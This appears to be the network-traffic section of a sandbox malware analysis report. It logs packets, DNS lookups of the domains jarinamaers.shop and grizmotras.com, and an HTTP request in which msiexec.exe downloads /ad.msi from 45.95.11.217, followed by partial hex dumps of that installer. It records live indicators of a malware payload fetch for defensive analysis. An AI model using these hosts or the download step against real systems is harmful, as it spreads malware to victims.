Apr 25, 2024 22:47:51.123918056 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.123963118 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.123965025 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.124005079 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.124043941 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.124058008 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.124082088 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.124154091 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.124732971 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.124764919 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.124814034 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.133661032 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.133692980 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.133755922 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.133774996 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.133790016 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.133824110 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.133861065 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.133897066 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.133930922 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.133936882 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.133999109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.134040117 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.180890083 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.180911064 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.181014061 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.188743114 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.188788891 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.188807011 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.188838005 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.188852072 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.188899040 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.189753056 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.189805984 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.189825058 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.189856052 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.234524965 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.345916033 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.345961094 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.346064091 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.355952978 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.355974913 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.355992079 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.356023073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.356051922 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.356061935 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.356069088 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.356117010 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.356134892 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.356153965 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.356153965 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.356190920 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.356194973 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.356235027 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.356276035 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.365711927 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.365732908 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.365864038 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.366097927 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.366367102 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.366385937 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.366404057 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.366420984 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.366434097 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.366463900 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.366473913 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.366504908 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.413783073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.413913965 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.413992882 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.423043013 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.423084974 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.423145056 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.423557043 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.423599005 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.423645020 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.423651934 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.423691988 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.423738956 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.423738956 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.467788935 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.468074083 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.577044010 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.577069998 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.577128887 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.586505890 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.586525917 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.586541891 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.586560011 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.586576939 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.586602926 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.587752104 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.587770939 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.587812901 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:55.193425894 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:55.193579912 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:55.193773985 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:55.429115057 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:49:19.953825951 CEST	49717	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:19.953918934 CEST	443	49717	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:19.958858967 CEST	49717	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:20.018007994 CEST	49717	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:20.018044949 CEST	443	49717	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:20.253211021 CEST	443	49717	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:20.253397942 CEST	49717	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:20.326467991 CEST	49717	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:20.326530933 CEST	443	49717	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:20.326891899 CEST	443	49717	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:20.327229023 CEST	49717	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:20.331803083 CEST	49717	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:20.372159958 CEST	443	49717	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:23.767498970 CEST	443	49717	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:23.767575979 CEST	49717	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:23.767630100 CEST	443	49717	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:23.767652988 CEST	443	49717	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:23.767680883 CEST	49717	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:23.767716885 CEST	49717	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:23.767997980 CEST	49717	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:23.768021107 CEST	443	49717	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:25.628417015 CEST	49718	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:25.628467083 CEST	443	49718	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:25.628530025 CEST	49718	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:25.629009962 CEST	49718	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:25.629029989 CEST	443	49718	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:25.857253075 CEST	443	49718	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:25.857369900 CEST	49718	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:26.866513968 CEST	49718	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:26.866555929 CEST	443	49718	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:26.868124962 CEST	49718	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:26.868138075 CEST	443	49718	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:31.832793951 CEST	443	49718	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:31.832866907 CEST	443	49718	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:31.832869053 CEST	49718	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:31.832911968 CEST	49718	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:31.838888884 CEST	49718	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:31.838906050 CEST	443	49718	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:31.943718910 CEST	49719	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:31.943758011 CEST	443	49719	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:31.944066048 CEST	49719	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:31.944154978 CEST	49719	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:31.944164991 CEST	443	49719	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:32.173988104 CEST	443	49719	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:32.174228907 CEST	49719	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:32.178117037 CEST	49719	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:32.178117037 CEST	49719	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:32.178123951 CEST	443	49719	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:32.178160906 CEST	443	49719	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:43.950598955 CEST	443	49719	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:43.950654984 CEST	443	49719	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:43.950747967 CEST	49719	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:44.543641090 CEST	49719	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:44.543677092 CEST	443	49719	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:44.733313084 CEST	49720	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:44.733355045 CEST	443	49720	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:44.733438015 CEST	49720	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:44.733670950 CEST	49720	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:44.733685017 CEST	443	49720	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:44.966825962 CEST	443	49720	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:44.966891050 CEST	49720	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:44.967477083 CEST	49720	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:44.967487097 CEST	443	49720	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:44.969225883 CEST	49720	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:44.969230890 CEST	443	49720	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:50.102958918 CEST	443	49720	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:50.103074074 CEST	443	49720	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:50.103324890 CEST	49720	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:50.103578091 CEST	49720	443	192.168.2.5	172.67.136.103
Apr 25, 2024 22:49:50.103596926 CEST	443	49720	172.67.136.103	192.168.2.5
Apr 25, 2024 22:49:50.412823915 CEST	49721	443	192.168.2.5	104.21.59.82
Apr 25, 2024 22:49:50.412859917 CEST	443	49721	104.21.59.82	192.168.2.5
Apr 25, 2024 22:49:50.413198948 CEST	49721	443	192.168.2.5	104.21.59.82
Apr 25, 2024 22:49:50.413568020 CEST	49721	443	192.168.2.5	104.21.59.82
Apr 25, 2024 22:49:50.413578987 CEST	443	49721	104.21.59.82	192.168.2.5
Apr 25, 2024 22:49:50.650166988 CEST	443	49721	104.21.59.82	192.168.2.5
Apr 25, 2024 22:49:50.650399923 CEST	49721	443	192.168.2.5	104.21.59.82
Apr 25, 2024 22:49:50.653356075 CEST	49721	443	192.168.2.5	104.21.59.82
Apr 25, 2024 22:49:50.653363943 CEST	443	49721	104.21.59.82	192.168.2.5
Apr 25, 2024 22:49:50.653599977 CEST	443	49721	104.21.59.82	192.168.2.5
Apr 25, 2024 22:49:50.653698921 CEST	49721	443	192.168.2.5	104.21.59.82
Apr 25, 2024 22:49:50.654036999 CEST	49721	443	192.168.2.5	104.21.59.82
Apr 25, 2024 22:49:50.700107098 CEST	443	49721	104.21.59.82	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 22:49:19.797590971 CEST	56036	53	192.168.2.5	1.1.1.1
Apr 25, 2024 22:49:19.942534924 CEST	53	56036	1.1.1.1	192.168.2.5
Apr 25, 2024 22:49:50.272382021 CEST	55199	53	192.168.2.5	1.1.1.1
Apr 25, 2024 22:49:50.408873081 CEST	53	55199	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 25, 2024 22:49:19.797590971 CEST	192.168.2.5	1.1.1.1	0x8050	Standard query (0)	jarinamaers.shop	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:49:50.272382021 CEST	192.168.2.5	1.1.1.1	0x5f79	Standard query (0)	grizmotras.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Apr 25, 2024 22:47:43.115259886 CEST	1.1.1.1	192.168.2.5	0xefdd	No error (0)	prod.globalsign.map.fastly.net	151.101.2.133	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:47:43.115259886 CEST	1.1.1.1	192.168.2.5	0xefdd	No error (0)	prod.globalsign.map.fastly.net	151.101.66.133	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:47:43.115259886 CEST	1.1.1.1	192.168.2.5	0xefdd	No error (0)	prod.globalsign.map.fastly.net	151.101.194.133	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:47:43.115259886 CEST	1.1.1.1	192.168.2.5	0xefdd	No error (0)	prod.globalsign.map.fastly.net	151.101.130.133	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:48:13.644273996 CEST	1.1.1.1	192.168.2.5	0x36a8	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:48:13.644273996 CEST	1.1.1.1	192.168.2.5	0x36a8	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:49:00.464093924 CEST	1.1.1.1	192.168.2.5	0xd70e	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:49:00.464093924 CEST	1.1.1.1	192.168.2.5	0xd70e	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:49:19.942534924 CEST	1.1.1.1	192.168.2.5	0x8050	No error (0)	jarinamaers.shop	172.67.136.103	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:49:19.942534924 CEST	1.1.1.1	192.168.2.5	0x8050	No error (0)	jarinamaers.shop	104.21.46.75	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:49:50.408873081 CEST	1.1.1.1	192.168.2.5	0x5f79	No error (0)	grizmotras.com	104.21.59.82	A (IP address)	IN (0x0001)	false
Apr 25, 2024 22:49:50.408873081 CEST	1.1.1.1	192.168.2.5	0x5f79	No error (0)	grizmotras.com	172.67.219.28	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

jarinamaers.shop

grizmotras.com

45.95.11.217

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	45.95.11.217	80	6468	C:\Windows\System32\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 22:47:44.880877018 CEST	112	OUT	GET /ad.msi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows Installer Host: 45.95.11.217
Apr 25, 2024 22:47:45.110301018 CEST	1289	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 20:47:44 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 25 Apr 2024 14:19:45 GMT ETag: "18b600-616ec7a95e240" Accept-Ranges: bytes Content-Length: 1619456 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msi Data Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 01 00 00 00 00 00 00 00 00 10 00 00 03 00 00 00 05 00 00 00 fe ff ff ff 00 00 00 00 00 00 00 00 45 00 00 00 cf 00 00 00 61 01 00 00 d3 01 00 00 d4 01 00 00 d5 01 00 00 d6 01 00 00 d7 01 00 00 d8 01 00 00 e6 04 00 00 28 05 00 00 29 05 00 00 2a 05 00 00 2b 05 00 00 2c 05 00 00 2d 05 00 00 2e 05 00 00 08 00 00 00 41 09 00 00 42 09 00 00 43 09 00 00 44 09 00 00 45 09 00 00 46 09 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd ff ff ff 02 00 00 00 07 00 00 00 3b 00 00 00 05 00 00 00 06 00 00 00 21 00 00 00 33 00 00 00 fd ff ff ff 0a 00 00 00 0b 00 00 00 0c 00 00 00 0d 00 00 00 0e 00 00 00 0f 00 00 00 10 00 00 00 11 00 00 00 12 00 00 00 13 00 00 00 14 00 00 00 15 00 00 00 16 00 00 00 17 00 00 00 18 00 00 00 19 00 00 00 1a 00 00 00 1b 00 00 00 1c 00 00 00 1d 00 00 00 1e 00 00 00 1f 00 00 00 20 00 00 00 2b 00 00 00 22 00 00 00 23 00 00 00 24 00 00 00 25 00 00 00 26 00 00 00 27 00 00 00 28 00 00 00 29 00 00 00 2a 00 00 00 31 00 00 00 2c 00 00 00 2d 00 00 00 2e 00 00 00 2f 00 00 00 30 00 00 00 34 00 00 00 32 00 00 00 3a 00 00 00 3f 00 00 00 35 00 00 00 36 00 00 00 37 00 00 00 38 00 00 00 39 00 00 00 3e 00 00 00 3c 00 00 00 b7 01 00 00 3d 00 00 00 a2 01 00 00 9e 08 00 00 40 00 00 00 41 00 00 00 42 00 00 00 43 00 00 00 44 00 00 00 b7 08 00 00 fd ff ff ff 47 00 00 00 48 00 00 00 49 00 00 00 4a 00 00 00 4b 00 00 00 4c 00 00 00 4d 00 00 00 4e 00 00 00 4f 00 00 00 50 00 00 00 51 00 00 00 52 00 00 00 53 00 00 00 54 00 00 00 55 00 00 00 56 00 00 00 57 00 00 00 58 00 00 00 59 00 00 00 5a 00 00 00 5b 00 00 00 5c 00 00 00 5d 00 00 00 5e 00 00 00 5f 00 00 00 60 00 00 00 61 00 00 00 62 00 00 00 63 00 00 00 64 00 00 00 65 00 00 00 66 00 00 00 67 00 00 00 68 00 00 00 69 00 00 00 6a 00 00 00 6b 00 00 00 6c 00 00 00 6d 00 00 00 6e 00 00 00 6f 00 00 00 70 00 00 00 71 00 00 00 72 00 00 00 73 00 00 00 74 00 00 00 75 00 00 00 76 00 00 00 77 00 00 00 78 Data Ascii: >Ea()+,-.ABCDEF;!3 +"#$%&'()1,-./042:?56789><=@ABCDGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwx
Apr 25, 2024 22:47:45.110466003 CEST	1289	IN	Data Raw: 00 00 00 79 00 00 00 7a 00 00 00 7b 00 00 00 7c 00 00 00 7d 00 00 00 7e 00 00 00 7f 00 00 00 80 00 00 00 52 00 6f 00 6f 00 74 00 20 00 45 00 6e 00 74 00 72 00 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: yz{\|}~Root EntryFgSummaryInformation(
Apr 25, 2024 22:47:45.110502005 CEST	1289	IN	Data Raw: 00 00 3b 00 00 00 3c 00 00 00 3d 00 00 00 3e 00 00 00 3f 00 00 00 40 00 00 00 41 00 00 00 42 00 00 00 43 00 00 00 44 00 00 00 45 00 00 00 46 00 00 00 47 00 00 00 48 00 00 00 49 00 00 00 4a 00 00 00 4b 00 00 00 4c 00 00 00 4d 00 00 00 4e 00 00 00 Data Ascii: ;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`adfghijklmnopwrstuv
Apr 25, 2024 22:47:45.110563993 CEST	1289	IN	Data Raw: 01 14 01 16 01 da 00 01 00 1a 01 1c 01 48 ad 04 a1 04 81 02 85 00 99 26 9d 26 ad 02 a5 00 9d 48 ad ff 9d 02 95 26 ad 02 85 26 ad 48 ad 20 ad 20 ad 04 8d 04 91 04 91 ff 9d 02 95 20 9d ff 9d ff 9d 48 ad 00 9d 02 95 48 ad 00 9d 00 9d 48 ad 00 9d 02 Data Ascii: H&&H&&H HHHH HHHHH&HHH@ HH222H222H&&@HHHH222HH22
Apr 25, 2024 22:47:45.110578060 CEST	1289	IN	Data Raw: 3f 09 00 00 fe ff ff ff fe ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff fd ff ff ff 48 09 00 00 49 09 00 00 4a 09 00 00 4b 09 00 00 4c 09 00 00 4d 09 00 00 4e 09 00 00 4f 09 00 00 50 09 00 00 51 09 00 00 52 09 00 00 53 09 Data Ascii: ?HIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{
Apr 25, 2024 22:47:45.110624075 CEST	1289	IN	Data Raw: 75 73 65 64 2e 20 54 68 69 73 20 73 69 7a 65 20 69 73 20 67 69 76 65 6e 20 69 6e 20 6f 75 72 20 75 6e 69 74 73 20 28 31 2f 31 32 20 6f 66 20 74 68 65 20 73 79 73 74 65 6d 20 66 6f 6e 74 20 68 65 69 67 68 74 29 2e 20 41 73 73 75 6d 69 6e 67 20 74 Data Ascii: used. This size is given in our units (1/12 of the system font height). Assuming that the system font is set to 12 point size, this is equivalent to the point size.Description of columnPrimary key, non-localized token, foreign key to File tabl
Apr 25, 2024 22:47:45.110668898 CEST	1289	IN	Data Raw: 6c 65 66 74 20 63 6f 72 6e 65 72 20 6f 66 20 74 68 65 20 62 6f 75 6e 64 69 6e 67 20 72 65 63 74 61 6e 67 6c 65 20 6f 66 20 74 68 65 20 63 6f 6e 74 72 6f 6c 2e 43 6f 6e 74 72 6f 6c 5f 46 69 72 73 74 44 65 66 69 6e 65 73 20 74 68 65 20 63 6f 6e 74 Data Ascii: left corner of the bounding rectangle of the control.Control_FirstDefines the control that has the focus when the dialog is created.ErrorMessageTemplateError formatting template, obtained from user ed. or localizers.FeatureDirectory_DirectoryU
Apr 25, 2024 22:47:45.110742092 CEST	1289	IN	Data Raw: 73 74 72 69 6e 67 20 69 6e 20 74 68 65 20 52 47 42 20 66 6f 72 6d 61 74 20 28 52 65 64 2c 20 47 72 65 65 6e 2c 20 42 6c 75 65 20 65 61 63 68 20 30 2d 32 35 35 2c 20 52 47 42 20 3d 20 52 20 2b 20 32 35 36 2a 47 20 2b 20 32 35 36 5e 32 2a 42 29 2e Data Ascii: string in the RGB format (Red, Green, Blue each 0-255, RGB = R + 256G + 256^2B).Required key of a Directory table record. This is actually a property name whose value contains the actual path, set either by the AppSearch action or with the d
Apr 25, 2024 22:47:45.110843897 CEST	1289	IN	Data Raw: 74 6f 20 73 65 74 20 74 68 65 20 69 6e 69 74 69 61 6c 20 74 65 78 74 20 63 6f 6e 74 61 69 6e 65 64 20 77 69 74 68 69 6e 20 61 20 63 6f 6e 74 72 6f 6c 20 28 69 66 20 61 70 70 72 6f 70 72 69 61 74 65 29 2e 43 6f 6e 74 72 6f 6c 5f 4e 65 78 74 54 68 Data Ascii: to set the initial text contained within a control (if appropriate).Control_NextThe name of an other control on the same dialog. This link defines the tab order of the controls. The links have to form one or more cycles!HelpThe help strings us
Apr 25, 2024 22:47:45.110856056 CEST	1289	IN	Data Raw: 76 61 74 65 20 75 73 65 2e 54 68 65 20 6e 75 6d 65 72 69 63 20 63 75 73 74 6f 6d 20 61 63 74 69 6f 6e 20 74 79 70 65 2c 20 63 6f 6e 73 69 73 74 69 6e 67 20 6f 66 20 73 6f 75 72 63 65 20 6c 6f 63 61 74 69 6f 6e 2c 20 63 6f 64 65 20 74 79 70 65 2c Data Ascii: vate use.The numeric custom action type, consisting of source location, code type, entry, option flags.SourceCustomSourceThe table reference of the source of the code.TargetExcecution parameter, depends on the type of custom actionExtendedType
